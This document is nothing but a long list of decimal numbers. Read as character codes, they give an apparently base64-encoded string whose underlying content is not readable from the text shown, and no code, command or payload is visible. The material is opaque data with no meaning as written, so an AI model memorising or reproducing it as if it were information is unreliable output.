99 68 53 116 66 117 101 76 71 120 67 119 108 115 119 56 50 68 119 78 122 102 83 67 114 103 108 66 66 67 83 105 109 102 73 71 103 122 52 65 56 106 84 119 70 68 82 110 53 106 122 82 65 115 103 83 56 71 83 84 67 111 110 84 106 115 115 113 53 77 89 112 104 121 78 122 101 108 86 67 105 100 110 112 103 50 75 109 68 117 105 88 105 111 111 97 98 65 112 106 80 113 87 85 114 65 118 116 118 72 78 77 51 104 106 116 81 50 84 117 118 114 43 74 117 122 87 115 116 121 55 87 55 112 81 98 118 81 75 97 71 102 107 107 111 102 84 57 76 108 119 113 65 47 112 82 106 65 83 85 51 50 100 105 83 75 105 71 75 88 80 49 72 102 98 50 109 86 113 112 55 67 69 109 57 118 83 110 108 99 102 119 108 101 53 57 74 106 105 100 74 53 78 119 116 102 53 116 99 49 106 75 69 73 97 53 53 85 114 80 48 86 110 79 71 100 77 90 82 116 57 48 68 66 114 122 121 111 70 55 81 115 51 80 81 52 80 120 78 83 119 104 117 106 71 55 66 120 112 109 89 117 104 112 113 122 70 97 86 106 71 113 113 65 120 82 105 99 57 66 65 116 111 97 118 53 48 80 71 69 86 77 52 81 101 109 80 74 83 116 80 88 54 43 75 49 79 51 43 84 65 52 55 79 88 57 57 89 115 84 87 71 72 75 89 116 53 67 56 112 50 86 84 84 122 112 121 43 71 43 57 75 81 110 88 52 77 77 117 68 118 75 47 76 97 109 70 84 79 112 57 120 75 78 99 72 69 104 108 98 65 57 103 106 115 106 76 70 102 73 107 88 70 121 81 55 98 53 54 67 72 43 80 112 50 85 78 66 120 113 108 112 48 49 101 80 67 55 109 54 109 118 50 69 51 74 83 116 115 79 51 90 54 47 74 75 102 69 112 55 89 110 56 98 69 50 108 65 73 83 90 121 70 116 83 97 77 105 89 117 68 73 115 72 107 110 89 107 71 71 76 71 81 75 90 108 78 107 89 109 72 81 86 50 97 51 82 103 81 50 85 105 86 85 106 119 121 48 53 52 47 80 52 122 77 65 65 106 90 50 106 100 53 84 115 89 89 108 87 50 108 115 110 76 69 67 117 104 120 78 105 86 122 119 82 70 77 83 114 52 90 101 120 77 74 75 90 114 116 43 54 84 43 118 109 116 85 88 48 115 68 83 83 57 70 55 97 108 110 120 55 47 57 84 76 49 102 112 48 75 54 71 119 120 114 50 90 74 66 119 67 69 74 79 120 110 103 117 99 78 82 100 114 104 104 80 102 109 56 70 55 115 68 77 71 90 49 86 114 100 43 88 82 55 117 81 69 97 103 65 82 56 114 52 103 70 99 52 109 43 105 80 97 66 101 47 50 120 47 52 43 115 69 77 106 51 53 56 49 102 80 72 56 105 106 113 99 52 84 72 75 112 109 88 110 65 71 120 84 115 99 100 115 112 77 82 108 83 110 85 106 77 71 114 72 82 72 79 51 66 51 70 110 82 103 57 114 76 116 114 117 88 74 55 69 43 76 104 48 80 103 67 87 99 97 70 115 73 89 104 80 47 72 73 56 79 51 111 56 53 107 109 113 111 117 89 73 101 106 73 101 68 105 83 53 90 77 66 101 48 52 114 43 77 122 118 109 65 107 117 114 108 90 109 106 115 57 84 54 98 50 76 69 53 52 110 43 101 52 79 68 47 54 118 122 100 111 71 83 89 88 102 111 121 106 115 108 81 83 70 57 116 99 79 86 119 80 114 110 100 118 47 87 97 121 100 50 120 72 90 122 56 70 65 43 47 109 103 113 78 106 89 111 107 89 108 101 74 120 77 54 68 57 90 76 79 89 115 97 110 79 97 80 74 117 98 78 67 111 71 112 77 100 70 97 80 79 115 103 83 79 54 56 90 103 122 67 75 115 118 106 122 122 82 85 107 70 102 111 114 67 51 52 77 68 69 56 66 47 102 112 82 121 112 119 102 43 79 88 49 70 119 56 80 110 119 121 49 71 56 118 53 51 80 43 103 49 98 56 110 73 79 57 104 120 43 117 118 122 99 102 52 100 68 54 55 70 66 114 50 57 110 119 54 79 105 98 75 110 117 98 120 50 114 78 48 97 65 73 88 86 105 86 115 72 90 87 117 122 112 101 80 116 77 107 78 120 72 118 69 108 69 43 52 47 90 51 105 90 48 74 49 73 110 103 85 116 121 72 68 111 97 81 121 43 114 79 112 90 97 104 69 53 109 51 105 122 83 67 76 81 71 112 102 47 118 79 82 114 81 67 69 53 49 48 79 85 118 55 43 80 71 68 78 50 115 71 121 118 101 98 112 105 97 114 48 109 50 90 50 104 71 98 99 115 89 118 103 50 116 83 117 120 106 120 111 122 118 105 70 98 81 109 98 81 115 69 88 121 108 76 102 86 65 78 109 53 73 73 115 74 48 122 79 47 102 120 47 103 100 66 115 50 111 67 72 79 54 114 119 78 47 56 66 56 70 69 69 50 114 54 75 76 47 75 106 105 76 87 82 76 86 51 80 119 70 80 81 104 77 106 102 84 51 120 65 79 113 70 69 121 69 56 75 114 106 78 54 47 66 87 84 106 56 50 102 70 108 116 103 70 74 78 49 54 102 71 85 76 101 55 80 47 119 76 117 55 114 97 118 109 98 118 88 68 53 100 66 56 114 49 104 48 47 115 51 101 106 85 108 47 66 55 51 82 57 48 118 48 114 48 80 117 76 55 71 90 83 103 116 101 109 107 90 57 77 57 65 79 112 72 80 85 122 90 48 107 117 100 76 110 66 121 90 111 101 83 108 98 75 71 90 109 74 51 110 53 68 115 111 101 56 48 120 68 115 80 118 100 111 111 82 67 43 66 103 78 102 50 86 100 101 104 120 78 68 118 56 78 110 49 71 111 87 80 119 74 117 98 51 54 100 74 72 57 118 117 55 74 87 86 47 47 43 97 106 114 87 98 78 81 87 101 98 56 79 68 122 98 71 120 69 88 70 113 43 53 122 112 119 83 87 51 55 102 114 43 83 83 55 84 82 55 80 74 107 121 50 109 77 72 54 65 74 97 88 97 88 52 79 108 69 103 115 115 55 109 53 97 56 113 116 69 48 111 101 83 68 118 82 51 77 118 54 103 113 84 116 57 53 105 97 80 80 54 76 114 117 68 71 82 49 72 98 50 57 107 105 106 74 98 88 98 98 90 90 70 71 57 108 47 122 77 66 115 70 105 101 66 51 122 102 114 115 49 81 80 71 122 99 110 102 98 48 99 106 54 74 107 102 65 86 54 72 120 74 82 54 47 110 49 117 112 65 76 108 52 106 108 47 114 57 88 51 51 49 57 104 57 52 88 71 55 51 51 102 106 49 117 86 119 76 80 109 114 51 107 99 98 69 106 104 115 87 104 101 107 102 51 84 73 122 51 87 87 78 114 113 110 78 50 115 49 72 77 68 100 82 100 114 52 100 55 74 56 70 86 86 103 104 88 56 47 116 81 82 109 54 82 51 86 113 106 73 87 66 103 97 77 74 76 50 77 108 54 115 57 109 81 110 55 119 49 117 114 90 50 87 73 54 98 122 116 53 106 66 47 101 106 57 56 102 101 120 103 100 43 117 76 103 118 108 80 112 73 67 55 108 117 76 103 87 110 112 74 67 50 43 116 116 78 82 84 82 70 75 119 105 117 115 112 119 55 98 83 117 108 49 121 56 84 111 75 76 118 86 119 102 72 115 85 99 43 117 82 103 76 110 100 101 52 74 99 88 51 57 47 43 110 99 108 75 106 119 118 53 101 120 99 108 115 112 106 70 48 52 53 70 117 118 53 89 51 65 73 89 109 111 87 120 56 76 77 122 49 120 80 49 101 74 82 77 86 120 117 90 122 122 83 111 77 101 51 79 77 102 78 120 109 104 79 99 78 99 118 111 54 55 86 117 120 67 102 89 47 54 100 69 116 74 88 77 70 77 109 103 78 99 113 80 57 102 116 111 117 78 66 102 97 109 79 66 87 51 68 49 106 107 79 55 101 102 101 97 73 68 47 72 55 106 101 83 77 57 98 97 84 71 103 112 76 117 104 76 85 100 118 80 109 102 74 110 105 114 43 51 77 71 114 57 112 79 69 97 57 43 53 51 112 72 82 101 109 99 122 71 121 47 87 83 71 99 114 110 99 89 50 113 77 112 89 99 71 106 103 74 82 82 113 81 88 109 78 122 120 101 113 110 81 55 109 116 65 51 112 77 86 67 66 56 120 110 48 117 51 102 51 54 117 68 106 48 49 100 99 51 120 43 101 80 47 114 48 105 119 65 74 101 55 109 90 110 55 70 49 52 100 98 100 53 43 74 54 121 80 55 79 111 49 103 43 98 108 121 102 78 68 102 118 72 52 100 57 110 103 116 106 102 67 87 108 111 49 73 54 108 107 73 122 76 79 57 57 80 80 70 82 54 49 104 48 99 84 108 105 89 118 100 83 50 84 90 113 89 43 108 113 56 50 116 73 99 78 86 49 68 117 70 118 43 72 106 101 83 120 116 43 112 113 76 43 75 112 43 71 68 118 80 43 47 74 54 86 119 114 66 55 69 113 84 51 89 87 56 78 98 68 86 48 51 86 72 81 84 88 43 72 77 117 51 120 119 54 84 49 65 102 51 116 109 69 111 120 70 122 120 53 55 99 74 80 103 113 75 122 101 116 77 67 56 109 71 111 71 116 57 115 48 83 120 115 72 57 55 102 110 68 52 122 43 47 70 69 87 101 80 82 81 112 72 103 106 100 77 48 75 43 109 120 122 54 56 114 68 89 83 89 67 54 77 122 78 51 76 85 88 87 73 81 76 122 101 55 106 109 117 57 57 101 75 121 120 47 112 97 105 53 49 98 88 103 120 67 66 90 112 68 107 53 65 102 52 57 110 116 56 54 57 85 118 76 114 104 90 68 77 121 43 76 113 106 88 102 55 81 105 54 112 109 80 83 88 70 84 104 118 118 72 56 82 51 120 120 55 120 80 80 78 52 74 98 107 97 87 70 55 73 82 54 43 54 51 115 115 71 116 97 99 51 81 51 88 51 97 103 69 99 70 88 101 115 106 99 73 117 52 47 53 84 79 49 55 56 90 117 67 120 51 68 112 86 98 51 79 88 52 57 98 122 105 47 73 108 111 55 81 57 99 90 100 55 97 81 53 71 99 108 99 107 47 98 108 67 69 114 99 50 113 88 104 118 51 80 99 75 76 118 56 51 78 53 107 118 121 104 116 111 103 113 56 90 101 88 84 82 119 51 116 88 51 48 97 110 74 54 109 48 87 54 117 67 120 113 97 52 109 80 69 82 100 112 99 43 76 80 113 114 113 67 105 106 111 48 54 51 80 51 49 104 117 90 111 54 70 101 86 81 103 112 51 100 54 104 54 81 54 71 102 117 68 87 82 65 104 115 57 49 90 81 115 55 90 120 78 108 72 50 76 111 122 103 113 72 74 88 68 114 50 103 110 57 100 81 117 111 112 102 76 121 97 109 113 87 99 99 74 70 55 104 98 104 79 84 90 51 54 43 50 49 65 54 115 121 116 120 48 52 71 108 105 89 50 90 114 117 68 53 120 80 53 55 84 57 113 43 80 71 100 104 112 97 43 117 97 49 74 106 77 53 89 118 115 69 48 110 113 52 103 80 117 114 57 66 117 98 83 120 72 57 47 55 71 74 118 84 107 71 43 104 119 109 110 48 108 78 114 72 119 53 87 111 114 101 47 79 102 110 87 57 75 88 53 55 57 105 76 48 102 107 97 117 77 76 86 110 114 52 47 51 49 117 57 67 68 55 98 55 47 80 54 75 69 73 114 90 122 97 56 71 109 47 56 110 82 83 53 67 84 71 122 82 88 77 56 108 55 117 120 73 78 108 121 114 107 98 51 90 86 65 89 80 87 88 70 54 53 66 106 76 120 85 118 109 75 90 43 66 49 101 56 112 73 89 101 102 100 82 66 98 51 102 51 47 55 57 113 120 50 66 111 98 103 65 49 85 99 57 72 109 72 104 47 84 54 82 88 65 87 48 116 56 110 100 114 119 115 54 106 77 100 74 81 100 101 51 108 90 86 90 49 108 49 76 119 101 119 112 56 102 101 122 83 65 114 76 88 78 48 102 109 51 74 71 68 103 73 66 106 66 109 48 86 102 87 114 111 53 69 78 115 109 75 113 104 52 107 47 66 109 75 67 84 99 85 117 103 53 101 118 80 48 51 109 66 117 75 54 57 90 90 51 53 71 111 116 47 71 99 53 78 71 51 69 50 118 47 53 55 117 47 120 99 106 51 74 116 102 114 119 122 99 66 78 101 68 90 89 76 47 101 82 49 54 80 76 72 103 100 107 73 55 54 72 80 54 47 108 75 85 114 116 100 57 50 77 71 109 120 55 54 108 115 121 75 69 74 122 119 100 106 90 56 47 74 110 121 69 57 110 78 103 114 120 105 49 76 47 122 52 115 113 47 74 49 80 104 117 118 109 100 89 51 76 103 55 71 116 90 49 100 43 53 118 114 102 108 56 89 74 118 89 120 116 53 89 87 97 80 78 52 49 55 101 80 86 101 102 66 121 52 101 65 98 109 121 57 117 97 99 119 47 84 84 99 47 90 110 104 76 65 69 48 80 105 101 121 57 122 71 43 109 69 118 81 53 115 84 86 99 118 78 81 48 99 51 100 88 88 77 53 120 77 77 56 110 75 79 98 53 114 115 55 99 51 53 120 121 48 51 102 113 55 120 72 97 109 113 47 117 47 47 120 108 118 108 47 108 101 102 112 51 89 113 51 110 74 120 88 116 118 57 57 106 52 65 102 107 85 99 122 81 119 74 71 67 48 77 86 83 68 83 89 116 49 105 54 112 80 77 112 122 82 57 99 76 76 120 105 78 113 102 49 47 100 72 69 70 52 109 84 100 49 47 57 121 75 69 102 112 86 103 81 99 108 49 55 55 50 78 47 47 100 104 82 69 106 80 49 76 118 49 69 51 111 109 110 86 118 80 106 107 55 78 106 43 65 119 98 105 117 83 97 53 97 122 113 70 72 80 113 51 66 49 117 98 55 47 81 115 66 75 57 115 104 55 76 53 111 103 88 70 52 65 109 118 110 122 53 71 80 86 118 121 49 55 110 51 84 52 100 43 112 80 68 100 104 97 107 79 109 108 97 116 43 112 119 55 48 57 97 101 67 69 43 56 109 112 111 77 67 100 98 89 52 65 115 75 114 106 100 110 78 90 90 77 103 49 56 80 81 49 101 110 85 67 109 98 121 51 108 87 47 82 86 56 102 103 111 107 111 118 118 90 57 122 102 102 50 53 108 51 99 65 70 100 118 68 57 78 53 102 106 108 114 111 103 103 98 111 56 77 43 86 100 43 114 79 53 53 47 81 115 82 70 112 78 78 90 76 122 74 48 116 57 89 119 87 116 65 114 75 79 75 112 69 85 76 111 71 50 110 114 51 101 52 81 74 82 100 54 51 107 108 107 50 116 51 110 80 122 85 117 114 55 53 47 53 110 100 76 53 100 57 84 79 79 72 107 106 114 109 104 106 74 89 80 118 52 106 66 76 99 71 78 101 54 90 77 79 122 87 119 81 110 117 54 118 72 74 105 106 114 110 106 90 112 76 99 75 110 55 52 67 55 112 122 117 117 101 71 55 55 97 47 85 89 55 107 119 72 121 80 114 79 119 101 87 57 103 99 100 79 47 121 86 88 117 49 71 53 101 109 115 83 99 68 78 53 116 110 47 55 72 87 90 80 88 47 53 87 112 119 56 77 75 116 88 115 66 110 98 54 52 121 113 47 53 115 88 102 86 50 98 117 110 84 121 90 49 122 105 55 79 49 57 100 89 79 119 80 67 106 89 54 112 67 80 120 101 118 118 53 81 75 88 109 107 72 114 122 100 79 110 66 97 116 76 71 121 115 107 87 116 43 118 118 117 56 117 98 117 84 76 47 109 98 119 98 47 109 57 50 79 47 88 57 72 72 50 54 103 117 48 75 97 117 72 71 55 104 117 122 76 48 43 90 71 118 82 68 102 72 66 70 114 102 114 103 47 67 78 77 100 117 47 101 72 105 71 65 114 77 109 67 121 53 49 101 84 116 112 113 47 102 50 50 79 108 78 102 109 57 108 120 80 53 69 120 117 100 114 66 120 114 43 110 122 80 50 81 110 55 102 90 119 47 119 56 79 74 116 98 70 117 43 119 117 87 102 109 99 70 118 56 53 99 115 121 109 101 107 65 78 90 85 102 85 109 89 121 112 71 48 54 43 78 118 106 50 54 77 112 75 88 50 49 79 55 57 118 79 98 74 88 77 53 101 114 47 106 112 56 119 100 88 108 49 113 51 90 85 104 78 70 81 103 121 104 109 75 73 87 72 115 98 77 80 53 80 110 98 78 55 70 101 86 99 65 71 106 117 89 51 51 120 116 55 90 53 102 119 103 88 78 54 122 107 53 66 87 53 119 78 51 43 47 51 97 67 56 119 75 70 118 88 104 52 69 74 102 78 122 114 89 121 115 76 80 107 77 108 54 76 65 102 43 43 72 78 53 110 101 111 65 98 50 99 75 117 120 100 85 113 103 78 90 108 115 100 55 100 57 101 106 105 54 113 53 71 80 90 88 90 53 55 52 79 72 81 110 90 65 85 121 119 51 75 84 47 116 104 86 70 109 90 47 50 76 57 82 113 83 87 102 106 115 70 55 65 43 47 76 113 50 55 71 53 87 117 71 54 100 51 120 115 110 57 51 122 50 76 51 56 43 88 80 48 109 116 106 56 110 43 85 79 112 113 116 88 110 121 120 110 90 113 82 70 122 43 68 116 43 87 103 110 103 49 66 88 122 109 76 76 121 54 69 56 75 113 114 115 57 69 47 66 53 57 101 114 68 101 52 108 121 85 48 74 117 122 108 66 122 84 51 80 87 49 69 90 102 107 57 51 113 100 80 74 112 102 78 80 121 88 48 72 80 104 55 116 117 51 122 56 110 43 84 119 43 78 116 79 73 85 47 74 109 67 82 90 57 101 82 56 71 71 102 51 110 98 109 53 51 86 51 56 87 66 117 71 55 117 120 50 84 73 85 72 102 109 56 47 74 118 76 113 106 79 80 49 105 114 54 49 86 51 82 50 87 48 48 68 113 101 101 65 47 119 69 49 114 84 48 89 110 102 68 81 78 105 56 97 72 47 105 77 43 87 108 47 97 68 52 122 115 43 84 119 88 108 47 86 43 68 70 65 53 102 111 103 87 112 85 76 49 113 68 115 98 85 86 52 82 109 102 86 120 84 122 53 118 74 106 77 122 112 47 119 99 77 121 102 77 115 53 79 57 84 118 79 53 57 106 102 115 73 122 52 103 48 87 53 43 108 52 86 68 118 57 84 84 105 122 76 115 72 78 108 86 106 82 47 102 75 99 102 118 85 120 117 43 102 57 88 112 54 82 107 54 54 77 79 76 122 50 100 49 106 107 87 66 43 52 47 83 84 119 114 108 48 117 76 49 104 89 73 100 75 65 109 102 118 43 57 57 70 76 106 72 98 50 49 117 102 118 67 98 75 78 107 52 119 52 54 102 90 101 77 56 55 50 47 109 120 81 103 90 54 51 69 112 105 112 88 100 43 76 121 121 52 80 107 102 107 88 99 103 118 110 108 49 89 82 114 82 43 104 97 90 50 75 98 87 115 122 101 52 47 98 67 57 114 90 100 122 72 73 52 79 83 97 108 81 68 122 51 114 57 109 51 56 108 88 114 109 80 55 47 48 108 80 68 109 53 111 79 72 103 98 106 54 66 69 72 77 88 53 51 118 54 71 122 113 89 71 108 70 89 85 57 87 80 108 83 77 67 81 105 106 65 75 55 97 57 112 105 77 100 121 121 54 53 113 120 105 47 102 109 99 53 81 54 79 109 82 70 105 80 48 99 116 104 56 110 90 120 122 47 101 80 115 119 99 106 116 119 82 107 106 120 70 56 56 99 80 43 53 105 75 113 117 113 112 115 121 86 55 85 103 56 81 99 80 98 47 47 48 122 72 79 107 77 106 84 54 115 67 72 50 88 79 55 118 85 56 115 116 77 75 99 114 110 105 90 117 110 43 49 100 89 116 57 86 79 116 114 52 43 51 120 98 118 86 121 111 111 86 80 117 53 111 57 86 99 114 57 52 69 88 72 76 114 79 105 117 50 102 100 117 79 98 110 104 55 75 50 98 70 47 51 98 117 113 57 121 90 75 69 115 104 50 49 118 79 65 100 100 54 81 86 74 82 114 103 57 86 90 67 73 80 47 90 120 77 110 74 73 71 49 57 57 104 118 102 121 51 51 79 47 79 88 66 97 77 100 47 120 49 90 74 98 111 85 111 115 87 115 109 53 52 80 101 75 67 98 90 78 108 70 100 90 99 113 51 78 71 55 102 103 90 57 117 56 120 120 117 76 102 54 77 70 112 114 101 57 72 115 88 49 82 82 72 47 69 97 87 121 53 72 88 51 81 107 73 119 102 51 122 121 101 72 71 102 49 48 88 84 51 77 83 89 70 115 82 70 99 106 99 90 88 112 98 74 109 119 84 71 113 86 122 111 119 122 43 74 47 85 118 100 97 99 57 103 112 81 83 89 47 106 68 48 47 98 47 51 108 117 112 77 79 57 100 114 86 57 82 110 84 47 115 108 70 120 101 113 51 113 77 98 47 100 47 117 100 86 49 69 54 108 122 109 75 114 114 116 88 97 51 117 122 43 68 97 47 50 120 100 122 82 103 100 114 80 106 112 103 50 119 57 110 99 111 106 107 121 120 78 48 89 75 75 86 120 49 71 98 88 98 47 117 68 114 79 102 88 97 43 71 120 55 54 120 56 113 48 117 77 72 84 107 76 75 47 119 48 118 43 43 50 82 120 108 75 121 107 70 76 108 120 66 98 117 47 73 75 112 54 54 97 53 109 114 109 90 114 121 83 109 52 113 104 82 43 109 101 50 97 89 87 57 65 65 55 89 117 85 56 57 111 70 53 43 109 121 52 48 89 116 71 79 68 84 108 57 117 97 104 49 111 53 66 54 97 73 71 84 76 121 79 47 74 70 115 56 109 66 73 54 83 70 108 66 71 66 109 85 50 119 68 76 55 69 56 118 83 115 112 81 109 114 105 76 57 78 112 101 114 50 103 85 80 76 108 112 51 98 77 80 109 57 107 84 97 69 86 52 84 109 99 98 57 108 66 118 86 84 77 89 56 110 106 56 119 114 88 65 110 82 49 99 56 80 120 104 49 102 51 78 119 48 80 67 87 113 50 57 76 76 66 101 84 108 74 88 104 120 87 114 80 86 49 116 115 49 51 67 122 86 108 52 101 89 54 51 102 54 85 110 90 98 79 55 98 66 117 118 115 65 71 89 122 81 113 86 55 57 56 102 55 50 50 54 118 105 113 69 114 74 108 70 110 102 69 90 67 119 109 73 109 66 76 86 122 99 106 74 43 119 57 77 112 88 66 111 90 114 82 90 107 100 97 66 76 79 54 118 102 106 57 112 101 89 83 78 120 98 106 89 89 65 111 101 104 90 113 111 120 115 82 53 108 116 116 79 57 66 71 97 82 74 105 51 65 57 49 70 89 49 113 68 86 87 116 68 112 53 51 70 43 69 100 120 111 120 121 110 43 89 112 111 71 69 78 98 105 101 87 53 74 56 57 73 101 81 99 69 87 100 79 102 118 47 117 52 119 52 57 69 121 87 115 87 89 114 70 122 100 98 119 53 122 77 83 114 106 119 76 121 67 116 56 77 102 111 68 118 120 51 70 82 57 67 121 57 97 72 50 70 57 51 101 111 57 105 56 80 72 55 51 81 69 116 49 100 85 51 111 105 83 56 71 114 77 74 109 116 112 113 120 53 47 98 80 104 53 116 119 110 70 85 84 53 90 90 113 76 97 51 90 73 43 102 80 56 75 55 68 101 51 97 50 56 48 49 101 80 99 100 47 55 88 68 101 43 100 86 53 101 57 66 101 80 80 49 104 112 43 112 107 90 87 57 108 71 81 109 105 67 89 121 55 52 79 54 84 121 108 47 77 118 51 99 53 120 90 52 54 108 103 111 107 82 77 121 98 98 116 89 72 104 56 104 98 70 89 107 90 121 78 48 87 97 52 56 65 115 68 72 84 114 88 76 47 89 53 65 47 121 108 66 100 51 97 70 107 88 48 109 79 51 47 112 119 106 99 117 72 102 110 117 105 121 105 122 50 55 104 68 102 122 77 98 76 57 116 53 53 99 57 68 52 121 103 72 103 54 66 98 87 90 66 52 82 97 106 56 101 52 110 118 70 114 102 103 114 43 122 101 82 66 86 57 115 89 52 107 53 118 114 67 122 81 104 112 117 99 107 122 102 56 121 116 122 108 87 104 56 55 76 79 54 84 120 114 77 75 54 122 52 118 97 104 105 104 77 110 57 102 70 48 101 113 50 118 78 104 74 76 117 100 83 67 70 104 108 103 55 79 47 48 49 115 73 83 117 114 103 114 74 55 87 112 98 73 106 112 65 69 113 66 119 48 53 72 102 122 77 113 118 88 117 47 98 49 89 49 90 120 98 104 53 87 71 68 67 120 52 117 102 86 101 103 100 43 77 82 80 111 87 99 83 52 48 108 86 55 86 97 98 90 72 118 76 47 108 98 89 116 102 88 84 90 50 102 76 48 116 75 80 110 122 88 48 116 76 90 55 75 70 103 66 104 67 88 98 55 56 101 47 90 85 82 119 101 54 47 84 43 101 101 89 76 101 101 104 50 117 108 112 109 89 108 49 109 47 85 74 69 80 99 66 53 57 78 100 74 118 122 82 66 54 88 108 68 73 55 120 79 86 108 79 107 83 121 105 67 48 118 100 112 97 50 106 54 81 121 68 80 57 111 67 115 117 78 115 65 90 99 53 115 82 89 116 111 75 120 50 116 112 82 122 107 113 103 116 90 122 50 88 48 80 82 74 48 67 78 74 84 98 73 48 49 98 110 52 86 111 77 70 76 75 72 67 113 121 107 53 99 56 56 100 104 70 88 52 50 70 66 83 48 101 57 115 47 113 47 102 74 105 89 109 52 122 116 72 78 83 99 72 50 71 112 103 99 78 80 82 99 54 104 109 72 119 113 54 84 76 116 75 80 67 74 81 54 122 116 110 83 121 53 85 70 57 76 99 43 99 83 109 112 52 113 121 102 108 114 120 118 89 87 70 101 110 69 90 101 121 71 104 122 107 47 116 73 51 120 47 57 97 122 109 100 113 79 110 97 98 90 113 73 107 57 98 106 97 54 116 80 90 56 85 67 76 80 52 90 106 102 106 47 76 97 68 101 65 112 47 54 101 104 82 82 43 76 47 67 78 51 84 43 102 114 105 68 117 113 100 107 82 74 120 97 110 72 43 112 109 77 48 89 101 83 51 88 70 107 114 82 105 110 87 114 50 48 104 56 83 106 106 78 106 109 104 107 102 105 80 69 78 81 53 115 83 72 105 119 79 47 114 105 53 87 57 105 103 57 116 49 80 109 66 52 57 80 67 75 89 57 102 68 48 105 115 90 65 99 118 69 102 52 102 117 71 70 47 78 113 113 122 48 47 89 111 79 119 85 102 78 75 106 120 105 80 77 69 86 70 98 109 114 113 55 50 122 116 106 119 52 82 48 107 107 122 80 102 89 104 79 73 116 105 56 82 90 113 118 84 117 115 79 105 57 103 76 43 87 52 77 47 107 111 53 82 98 66 97 98 102 68 121 50 86 72 85 119 117 118 57 88 102 57 57 77 99 57 77 51 51 56 55 43 75 108 117 43 76 57 70 122 115 78 102 111 51 102 80 85 80 98 122 51 56 54 55 79 82 78 119 108 89 77 114 117 47 76 102 111 51 83 87 51 116 49 79 106 122 65 57 87 50 98 113 106 121 78 81 83 111 53 72 85 72 88 65 115 55 81 49 115 104 114 87 121 56 49 80 106 85 86 48 43 100 53 112 117 81 43 105 79 57 103 113 51 49 47 77 99 98 109 105 47 109 101 115 99 98 73 69 49 114 106 86 112 120 110 52 85 43 118 56 87 107 55 88 54 79 57 67 116 101 117 76 85 56 102 57 80 48 71 82 115 43 99 104 113 110 55 90 97 104 110 51 52 86 67 85 101 66 108 114 98 117 53 83 106 57 57 117 50 121 108 67 83 117 84 122 71 55 109 48 117 56 99 107 55 86 53 80 80 108 98 121 74 85 47 53 109 109 115 84 109 90 53 100 97 99 107 78 108 118 109 56 72 50 103 49 47 83 115 117 107 51 109 118 118 47 121 56 68 47 113 78 119 115 86 120 107 47 85 86 71 119 75 112 111 87 99 108 55 88 120 71 109 115 105 82 81 68 69 51 115 103 76 68 52 111 53 102 97 77 55 112 114 113 118 106 56 81 103 47 69 47 51 43 75 43 43 118 49 89 97 121 99 65 120 112 121 121 77 79 83 117 82 76 103 100 102 90 70 119 67 90 102 78 57 84 47 84 52 79 50 48 77 121 107 88 102 114 43 76 109 55 121 85 50 86 103 65 50 57 52 86 71 103 117 120 55 83 49 122 68 108 99 75 83 57 52 56 102 73 67 122 99 115 71 103 119 117 73 86 86 82 98 83 50 77 69 97 56 49 116 86 119 102 103 108 43 55 68 115 119 116 89 85 69 81 78 73 102 115 97 67 87 98 51 89 50 99 113 43 104 122 77 70 67 101 54 88 101 119 108 48 99 71 69 83 100 54 117 105 107 76 86 68 83 67 81 102 67 103 83 102 51 71 52 116 80 114 56 70 98 102 66 66 81 106 115 110 81 88 115 51 102 103 104 117 110 104 47 116 52 109 52 97 86 56 43 71 55 109 105 106 54 86 106 121 102 72 121 107 122 121 56 55 120 50 99 43 80 70 48 100 71 121 89 79 80 109 49 54 113 117 75 102 53 51 111 71 109 74 55 85 109 108 121 98 49 120 82 88 71 72 106 81 54 119 108 98 78 121 57 121 78 57 114 68 83 88 101 68 117 82 54 47 52 72 115 57 76 98 66 84 78 84 47 83 113 99 98 115 112 97 118 48 56 71 47 106 122 101 65 116 103 119 106 70 84 47 102 106 83 69 56 81 53 99 84 43 80 115 50 121 56 101 88 69 51 52 65 98 56 43 120 105 43 108 118 81 109 53 105 82 54 120 100 78 72 76 82 75 116 72 51 99 118 86 47 102 122 54 57 86 122 74 122 55 43 86 122 76 89 80 99 87 109 81 117 56 113 118 76 108 52 120 55 113 80 71 57 85 80 50 52 47 82 99 72 98 87 121 86 85 103 101 86 78 69 87 51 102 75 54 67 56 115 65 77 110 113 103 114 115 68 51 115 79 114 70 65 74 57 83 84 49 113 56 50 117 99 114 48 69 51 47 47 69 74 48 43 52 50 43 80 116 110 99 98 104 113 89 111 49 101 102 108 104 98 65 107 82 73 53 115 66 76 72 72 53 89 99 52 110 111 109 105 114 105 119 86 113 104 106 90 43 105 114 77 56 68 55 48 57 98 112 54 73 80 120 47 84 97 88 53 88 53 49 89 101 69 70 43 110 74 83 80 76 90 85 121 121 88 120 66 102 108 90 88 80 103 50 119 75 106 50 87 54 71 70 67 106 54 49 51 120 100 68 89 66 102 51 115 101 74 83 111 109 48 118 110 72 56 57 72 79 108 75 76 101 119 65 88 108 99 110 122 48 86 116 80 76 101 88 107 69 70 99 50 70 118 74 47 43 49 97 87 77 73 89 51 86 43 116 80 50 48 100 120 68 113 77 56 55 87 98 51 74 79 72 68 47 49 104 112 76 55 97 114 115 110 118 54 43 99 83 43 120 88 48 89 65 77 68 102 78 98 113 47 120 57 117 76 73 72 85 67 122 78 117 86 78 86 65 80 72 107 52 49 70 82 104 77 113 97 105 57 102 55 50 112 104 56 102 100 107 116 98 80 43 117 101 83 118 102 73 97 83 111 77 78 57 47 72 82 121 65 118 117 53 109 51 85 65 50 98 108 106 87 114 90 114 56 105 116 82 89 89 99 87 55 74 122 71 115 76 47 99 117 118 57 70 70 102 75 106 121 87 79 109 75 75 87 68 56 115 117 104 56 102 49 98 85 100 70 73 116 69 120 116 71 83 71 117 55 122 102 49 111 106 52 117 66 110 49 106 76 114 56 88 104 106 103 98 47 75 86 47 47 55 117 120 77 76 80 43 116 100 81 85 104 102 111 75 116 108 116 122 101 102 87 100 97 71 68 101 120 47 72 56 50 67 113 116 89 118 117 101 118 75 50 76 71 105 114 79 107 111 115 57 121 117 103 56 82 48 97 48 86 118 114 103 118 88 48 81 101 66 68 113 84 122 55 52 118 115 108 98 72 86 78 50 84 54 122 77 113 100 78 48 102 50 47 70 53 80 75 99 47 111 118 105 110 112 110 88 101 106 89 52 69 68 86 51 77 114 43 57 101 50 114 103 78 76 105 78 83 98 49 70 73 55 65 51 52 119 104 68 85 80 104 119 113 52 71 70 56 99 49 122 86 89 86 73 106 101 104 120 79 84 105 43 114 101 113 119 103 104 77 43 51 76 117 102 106 101 109 105 68 68 105 57 47 87 50 104 86 57 72 51 90 83 117 88 76 101 102 120 80 101 82 73 109 48 73 97 73 109 70 72 70 97 115 67 54 98 71 122 88 120 118 47 89 68 103 114 121 52 103 107 104 85 55 88 101 57 103 82 117 72 65 115 90 